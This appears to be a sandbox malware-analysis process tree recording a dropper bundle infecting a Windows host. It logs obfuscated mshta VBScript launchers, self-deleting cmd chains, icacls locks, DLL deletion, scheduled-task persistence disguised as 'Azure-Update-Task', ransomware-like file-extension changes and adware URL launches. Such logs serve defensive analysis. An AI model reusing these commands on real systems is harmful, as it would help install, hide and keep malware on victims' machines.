C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))10⤵PID:2668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F11⤵PID:3056
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY10⤵PID:2548
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "5771500.exe" /F9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712 -
C:\ProgramData\7915684.exe"C:\ProgramData\7915684.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 17607⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone4⤵
- Loads dropped DLL
PID:920 -
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exeSat19e4750dd01.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat19e4750dd01.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe" & exit6⤵PID:2644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sat19e4750dd01.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe4⤵
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat199ba8a4637dcb034.exeSat199ba8a4637dcb034.exe5⤵
- Executes dropped EXE
PID:820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe4⤵
- Loads dropped DLL
PID:972 -
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat1946eb84e6.exeSat1946eb84e6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe4⤵
- Loads dropped DLL
PID:1732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe4⤵
- Loads dropped DLL
PID:1752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe4⤵
- Loads dropped DLL
PID:1968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe4⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exeSat196ac06a9e6.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:676 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:1832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exeSat19e6a852f849bb2.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 9762⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exeSat19c6762a08beae.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:988
-
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exeSat19ba05e89ea6d406.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp"C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$60136,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe" /S /UID=burnerch23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2528 -
C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp" /SL5="$30180,281924,62464,C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1644 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe"C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe"4⤵
- Executes dropped EXE
PID:3008 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2552 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:568 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1586187 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2764 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:734242 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2056 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1192990 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:832 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:799774 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2452 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:799796 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:920 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:734281 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:8164 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1258587 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2968 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:4011062 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4708 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:472177 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4660 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵PID:2636
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514835⤵PID:8128
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515135⤵PID:1280
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872155⤵PID:1192
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631195⤵PID:4684
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942315⤵PID:4144
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=35⤵PID:4088
-
C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe"C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe /eufive & exit5⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe /eufive6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe" & exit7⤵PID:2356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f8⤵
- Kills process with taskkill
PID:2452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:1036
-
C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exeC:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe /qn CAMPAIGN="654"6⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:856 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133451 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵PID:1908
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe & exit5⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exeC:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2604 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe /mixfive & exit5⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe" & exit7⤵PID:2980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f8⤵
- Kills process with taskkill
PID:436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2po3pay4.up2\autosubplayer.exe /S & exit5⤵PID:2156
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2568 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2576
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2824 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3357038103890CB74DA0F3E186CE311B C2⤵PID:1208
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F390E3CD75E85D9C096B2FC1D2786C42⤵
- Blocklisted process makes network request
PID:2848 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:2440 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADA8DC425C27DE4B120E8174DFE95230 M Global\MSI00002⤵PID:960
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1360 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\510D.exeC:\Users\Admin\AppData\Local\Temp\510D.exe1⤵
- Executes dropped EXE
PID:1780
-
C:\Users\Admin\AppData\Local\Temp\6AA6.exeC:\Users\Admin\AppData\Local\Temp\6AA6.exe1⤵
- Executes dropped EXE
PID:1964
-
C:\Users\Admin\AppData\Local\Temp\8BAE.exeC:\Users\Admin\AppData\Local\Temp\8BAE.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\8BAE.exeC:\Users\Admin\AppData\Local\Temp\8BAE.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2448 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:592 -
C:\Users\Admin\AppData\Local\Temp\8BAE.exe"C:\Users\Admin\AppData\Local\Temp\8BAE.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2908
-
C:\Users\Admin\AppData\Local\Temp\8BAE.exe"C:\Users\Admin\AppData\Local\Temp\8BAE.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Modifies extensions of user files
PID:2128 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2028 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:1156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:744 -
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:752 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2636 -
C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"6⤵
- Executes dropped EXE
PID:2724 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:2504
-
C:\Users\Admin\AppData\Local\Temp\BEEF.exeC:\Users\Admin\AppData\Local\Temp\BEEF.exe1⤵
- Executes dropped EXE
PID:2532 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\BEEF.exe"2⤵PID:2196
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:2148 -
C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe"C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe"2⤵
- Executes dropped EXE
PID:1528 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"3⤵
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2908
-
C:\Windows\system32\taskeng.exetaskeng.exe {9A49859D-4422-408C-A7FB-6EBFD1C6673C} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:2856
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2400 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:688 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:2084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1956 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:2456 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1732 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:1504 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7960 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:7976 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2504 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:2340 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7956 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:8012 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8028 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:7956 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7944 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8000
-
C:\Users\Admin\AppData\Roaming\avwvuuwC:\Users\Admin\AppData\Roaming\avwvuuw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7964 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7728 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7684
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:1160 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7692
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:8080 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:2624
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7724 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7868
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7760 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7748
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:2368 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:1768
-
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:7704 -
C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exeC:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task3⤵PID:8068
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7216 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7244
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:7508 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:4484 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:4520
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:4952 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:5044
-
C:\Users\Admin\AppData\Roaming\avwvuuwC:\Users\Admin\AppData\Roaming\avwvuuw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4964 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:4676 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:4880
-
